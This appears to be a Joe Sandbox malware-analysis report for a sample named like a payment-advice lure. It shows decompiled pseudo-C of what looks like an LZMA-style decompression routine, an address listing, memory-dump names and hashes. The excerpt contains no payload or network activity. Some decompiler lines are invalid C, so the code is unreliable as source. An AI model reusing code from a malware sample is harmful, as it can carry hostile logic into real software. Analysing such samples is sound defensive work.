													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x004069b3
0x004069b3
0x004069b7
0x004069c4
0x004069ce
0x00000000
0x004069b9
0x004069b9
0x004069f4
0x004069f7
0x004069fa
0x004069fd
0x004069fd
0x00406a00
0x00406a07
0x00406a0c
0x004068ed
0x004068f0
0x00406c62
0x00406c62
0x00406c62
0x00406c65
0x00406c65
0x00406c65
0x00406c6b
0x00406c71
0x00406c77
0x00406c91
0x00406c94
0x00406c9a
0x00406ca5
0x00406ca7
0x00406c79
0x00406c79
0x00406c88
0x00406c8c
0x00406c8c
0x00406cb1
0x00000000
0x00000000
0x00406cb3
0x00406cb7
0x00406e66
0x00406e7c
0x00406e84
0x00406e8b
0x00406e8d
0x00406e94
0x00406e98
0x00406e98
0x00406cc3
0x00406cca
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cd8
0x00406cde
0x00406cde
0x0040647a
0x0040647a
0x0040647a
0x00406483
0x00000000
0x00000000
0x00406489
0x00000000
0x00406494
0x00000000
0x00000000
0x0040649d
0x004064a0
0x004064a3
0x004064a7
0x00000000
0x00000000
0x004064ad
0x004064b0
0x004064b2
0x004064b3
0x004064b6
0x004064b8
0x004064b9
0x004064bb
0x004064be
0x004064c3
0x004064c8
0x004064d1
0x004064e4
0x004064e7
0x004064f3
0x0040651b
0x0040651d
0x0040652b
0x0040652b
0x0040652f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040651f
0x0040651f
0x00406522
0x00406523
0x00406523
0x00000000
0x0040651f
0x004064f9
0x004064fe
0x004064fe
0x00406507
0x0040650f
0x00406512
0x00000000
0x00406518
0x00406518
0x00000000
0x00406518
0x00000000
0x00406535
0x00406535
0x00406539
0x00406de5
0x00000000
0x00406de5
0x00406542
0x00406552
0x00406555
0x00406558
0x00406558
0x00406558
0x0040655b
0x0040655f
0x00000000
0x00000000
0x00406561
0x00406567
0x00406591
0x00406597
0x0040659e
0x00000000
0x0040659e
0x0040656d
0x00406570
0x00406575
0x00406575
0x00406580
0x00406588
0x0040658b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065d0
0x004065d6
0x004065d9
0x004065e6
0x004065ee
0x00406c62
0x00406c62
0x00000000
0x00000000
0x004065a5
0x004065a5
0x004065a9
0x00406df4
0x00000000
0x00406df4
0x004065b5
0x004065c0
0x004065c0
0x004065c0
0x004065c3
0x004065c6
0x004065c9
0x004065ce
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c65
0x00406c65
0x00406c6b
0x00406c71
0x00406c77
0x00406c91
0x00406c94
0x00406c9a
0x00406ca5
0x00406ca7
0x00406c79
0x00406c79
0x00406c88
0x00406c8c
0x00406c8c
0x00406cb1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065f6
0x004065f8
0x004065fb
0x0040666c
0x0040666f
0x00406672
0x00406679
0x00406683
0x00406c62
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x00406c62
0x004065fd
0x00406601
0x00406604
0x00406606
0x00406609
0x0040660c
0x0040660e
0x00406611
0x00406613
0x00406618
0x0040661b
0x0040661e
0x00406622
0x00406629
0x0040662c
0x00406633
0x00406637
0x0040663f
0x0040663f
0x0040663f
0x00406639
0x00406639
0x00406639
0x0040662e
0x0040662e
0x0040662e
0x00406643
0x00406646
0x00406664
0x00406666
0x00000000
0x00406648
0x00406648
0x0040664b
0x0040664e
0x00406651
0x00406653
0x00406653
0x00406653
0x00406656
0x00406659
0x0040665b
0x0040665c
0x0040665f
0x00000000
0x0040665f
0x00000000
0x00406895
0x00406899
0x004068b7
0x004068ba
0x004068c1
0x004068c4
0x004068c7
0x004068ca
0x004068cd
0x004068d0
0x004068d2
0x004068d9
0x004068da
0x004068dc
0x004068df
0x004068e2
0x004068e5
0x004068e5
0x004068ea
0x00000000
0x004068ea
0x0040689b
0x0040689e
0x004068a1
0x004068ab
0x00406c62
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x00000000
0x004068ff
0x00406903
0x00406926
0x00406929
0x0040692c
0x00406936
0x00406905
0x00406905
0x00406908
0x0040690b
0x0040690e
0x0040691b
0x0040691e
0x0040691e
0x00406c62
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x00000000
0x00406942
0x00406946
0x00000000
0x00000000
0x0040694c
0x00406950
0x00000000
0x00000000
0x00406956
0x00406958
0x0040695c
0x0040695c
0x0040695f
0x00406963
0x00000000
0x00000000
0x00000000
0x00000000
0x004069da
0x004069de
0x004069e5
0x004069e8
0x004069eb
0x004069e0
0x004069e0
0x004069e0
0x004069ee
0x004069f1
0x00000000
0x00000000
0x00406a9a
0x00406a9a
0x00406a9e
0x00406e3c
0x00000000
0x00406e3c
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aae
0x00406ab1
0x00406ab7
0x00406ab9
0x00406ab9
0x00406ab9
0x00406abc
0x00406abf
0x00000000
0x00000000
0x0040668f
0x0040668f
0x00406693
0x00406e00
0x00000000
0x00406e00
0x00406699
0x0040669c
0x0040669f
0x004066a3
0x004066a6
0x004066ac
0x004066ae
0x004066ae
0x004066ae
0x004066b1
0x004066b4
0x004066b4
0x004066b7
0x004066ba
0x00000000
0x00000000
0x004066c0
0x004066c6
0x00000000
0x00000000
0x004066cc
0x004066cc
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066dc
0x004066dd
0x004066e0
0x004066e2
0x004066e8
0x004066eb
0x004066ee
0x004066f1
0x004066f4
0x004066f7
0x004066fa
0x00406716
0x00406719
0x0040671c
0x0040671f
0x00406726
0x0040672a
0x0040672c
0x00406730
0x004066fc
0x004066fc
0x00406700
0x00406708
0x0040670d
0x0040670f
0x00406711
0x00406711
0x00406733
0x0040673a
0x0040673d
0x00000000
0x00406743
0x00000000
0x00406743
0x00000000
0x00406748
0x00406748
0x0040674c
0x00406e0c
0x00000000
0x00406e0c
0x00406752
0x00406755
0x00406758
0x0040675c
0x0040675f
0x00406765
0x00406767
0x00406767
0x00406767
0x0040676a
0x0040676d
0x0040676d
0x0040676d
0x00406773
0x00000000
0x00000000
0x00406775
0x00406778
0x0040677b
0x0040677e
0x00406781
0x00406784
0x00406787
0x0040678a
0x0040678d
0x00406790
0x00406793
0x004067ab
0x004067ae
0x004067b1
0x004067b4
0x004067b4
0x004067b7
0x004067bb
0x004067bd
0x00406795
0x00406795
0x0040679d
0x004067a2
0x004067a4
0x004067a6
0x004067a6
0x004067c0
0x004067c7
0x004067ca
0x00000000
0x004067cc
0x00000000
0x004067cc
0x004067ca
0x004067d1
0x004067d1
0x004067d1
0x004067d1
0x00000000
0x00000000
0x0040680c
0x0040680c
0x00406810
0x00406e18
0x00000000
0x00406e18
0x00406816
0x00406819
0x0040681c
0x00406820
0x00406823
0x00406829
0x0040682b
0x0040682b
0x0040682b
0x0040682e
0x00406831
0x00406831
0x00406837
0x004067d5
0x004067d5
0x004067d8
0x00000000
0x004067d8
0x00406839
0x00406839
0x0040683c
0x0040683f
0x00406842
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406851
0x00406854
0x00406857
0x0040686f
0x00406872
0x00406875
0x00406878
0x00406878
0x0040687b
0x0040687f
0x00406881
0x00406859
0x00406859
0x00406861
0x00406866
0x00406868
0x0040686a
0x0040686a
0x00406884
0x0040688b
0x0040688e
0x00000000
0x00406890
0x00000000
0x00406890
0x00000000
0x00406b1d
0x00406b1d
0x00406b21
0x00406e48
0x00000000
0x00406e48
0x00406b27
0x00406b2a
0x00406b2d
0x00406b31
0x00406b34
0x00406b3a
0x00406b3c
0x00406b3c
0x00406b3c
0x00406b3f
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c2c
0x00406c30
0x00406c52
0x00406c55
0x00406c5f
0x00406c62
0x00406c62
0x00406c62
0x00000000
0x00406c62
0x00406c62
0x00406c32
0x00406c35
0x00406c39
0x00406c3c
0x00406c3c
0x00406c3f
0x00000000
0x00000000
0x00406ce9
0x00406ced
0x00406d0b
0x00406d0b
0x00406d0b
0x00406d12
0x00406d19
0x00406d20
0x00406d20
0x00000000
0x00406d20
0x00406cef
0x00406cf2
0x00406cf5
0x00406cf8
0x00406cff
0x00406c43
0x00406c43
0x00406c46
0x00000000
0x00000000
0x00406dda
0x00406ddd
0x00406cde
0x00000000
0x00000000
0x00406a14
0x00406a16
0x00406a1d
0x00406a1e
0x00406a20
0x00406a23
0x00000000
0x00000000
0x00406a2b
0x00406a2e
0x00406a31
0x00406a33
0x00406a35
0x00406a35
0x00406a36
0x00406a39
0x00406a40
0x00406a43
0x00406a51
0x00000000
0x00000000
0x00406d27
0x00406d27
0x00406d2a
0x00406d31
0x00000000
0x00000000
0x00406d36
0x00406d36
0x00406d3a
0x00406e72
0x00000000
0x00406e72
0x00406d40
0x00406d43
0x00406d46
0x00406d4a
0x00406d4d
0x00406d53
0x00406d55
0x00406d55
0x00406d55
0x00406d58
0x00406d5b
0x00406d5b
0x00406d5b
0x00406d5b
0x00406d5e
0x00406d5e
0x00406d62
0x00406dc2
0x00406dc5
0x00406dca
0x00406dcb
0x00406dcd
0x00406dcf
0x00406dd2
0x00406cde
0x00406cde
0x00000000
0x00406ce4
0x00406cde
0x00406d64
0x00406d6a
0x00406d6d
0x00406d70
0x00406d73
0x00406d76
0x00406d79
0x00406d7c
0x00406d7f
0x00406d82
0x00406d85
0x00406d9e
0x00406da1
0x00406da4
0x00406da7
0x00406dab
0x00406dad
0x00406dad
0x00406dae
0x00406db1
0x00406d87
0x00406d87
0x00406d8f
0x00406d94
0x00406d96
0x00406d99
0x00406d99
0x00406db4
0x00406dbb
0x00000000
0x00406dbd
0x00000000
0x00406dbd
0x00000000
0x00406a59
0x00406a5c
0x00406a92
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc2
0x00406bc5
0x00406bc5
0x00406bc8
0x00406bca
0x00406e54
0x00000000
0x00406e54
0x00406bd0
0x00406bd3
0x00000000
0x00000000
0x00406bd9
0x00406bdd
0x00406be0
0x00406be0
0x00406be0
0x00000000
0x00406be0
0x00406a5e
0x00406a60
0x00406a62
0x00406a64
0x00406a67
0x00406a68
0x00406a6a
0x00406a6c
0x00406a6f
0x00406a72
0x00406a88
0x00406a8d
0x00406ac5
0x00406ac5
0x00406ac9
0x00406af5
0x00406af7
0x00406afe
0x00406b01
0x00406b04
0x00406b04
0x00406b09
0x00406b09
0x00406b0b
0x00406b0e
0x00406b15
0x00406b18
0x00406b45
0x00406b45
0x00406b48
0x00406b4b
0x00406bbf
0x00406bbf
0x00406bbf
0x00000000
0x00406bbf
0x00406b4d
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00406b65
0x00406b68
0x00406b6b
0x00406b6e
0x00406b87
0x00406b89
0x00406b8c
0x00406b8d
0x00406b90
0x00406b92
0x00406b95
0x00406b97
0x00406b99
0x00406b9c
0x00406b9e
0x00406ba1
0x00406ba5
0x00406ba7
0x00406ba7
0x00406ba8
0x00406bab
0x00406bae
0x00406b70
0x00406b70
0x00406b78
0x00406b7d
0x00406b7f
0x00406b82
0x00406b82
0x00406bb1
0x00406bb8
0x00406b42
0x00406b42
0x00406b42
0x00406b42
0x00000000
0x00406bba
0x00000000
0x00406bba
0x00406bb8
0x00406acb
0x00406ace
0x00406ad0
0x00406ad3
0x00406ad6
0x00406ad9
0x00406adb
0x00406ade
0x00406ae1
0x00406ae1
0x00406ae4
0x00406ae4
0x00406ae7
0x00406aee
0x00406ac2
0x00406ac2
0x00406ac2
0x00406ac2
0x00000000
0x00406af0
0x00000000
0x00406af0
0x00406aee
0x00406a74
0x00406a77
0x00406a79
0x00406a7c
0x00000000
0x00000000
0x004067db
0x004067db
0x004067df
0x00406e24
0x00000000
0x00406e24
0x004067e5
0x004067e8
0x004067eb
0x004067ee
0x004067f1
0x004067f4
0x004067f7
0x004067f9
0x004067fc
0x004067ff
0x00406802
0x00406804
0x00406804
0x00406804
0x00000000
0x00000000
0x00406966
0x00406966
0x0040696a
0x00406e30
0x00000000
0x00406e30
0x00406970
0x00406973
0x00406976
0x00406979
0x0040697b
0x0040697b
0x0040697b
0x0040697e
0x00406981
0x00406984
0x00406987
0x0040698a
0x0040698d
0x0040698e
0x00406990
0x00406990
0x00406990
0x00406993
0x00406996
0x00406999
0x0040699c
0x0040699c
0x0040699c
0x0040699f
0x004069a1
0x004069a1
0x00000000
0x00000000
0x00406be3
0x00406be3
0x00406be3
0x00406be7
0x00000000
0x00000000
0x00406bed
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf8
0x00406bf8
0x00406bf8
0x00406bfb
0x00406bfe
0x00406c01
0x00406c04
0x00406c07
0x00406c0a
0x00406c0b
0x00406c0d
0x00406c0d
0x00406c0d
0x00406c10
0x00406c13
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c22
0x00406c25
0x00000000
0x00406c27
0x004069a4
0x004069a4
0x00000000
0x004069a4
0x00406c25
0x00406e5a
0x00000000
0x00000000
0x00406489
0x00406e91
0x00406e91
0x00000000
0x00406e91
0x00406cde
0x00406c65
0x00406c62
0x00000000
0x004069b7

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e17704cfcf72c8df979941797e4b0b3defb04d6abbfe177bdd58f92bded9ed7
Instruction ID: ad71f402e4a9b92a37c553ea73d368b4d72ad24497358f0b079e3127edd250f9
Opcode Fuzzy Hash: 8e17704cfcf72c8df979941797e4b0b3defb04d6abbfe177bdd58f92bded9ed7
Instruction Fuzzy Hash: 5D713571D04229DBDF28CF98C844BADBBB1FF44305F15806AD856BB281C7389A96DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004068FF Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004068FF() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406E99))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
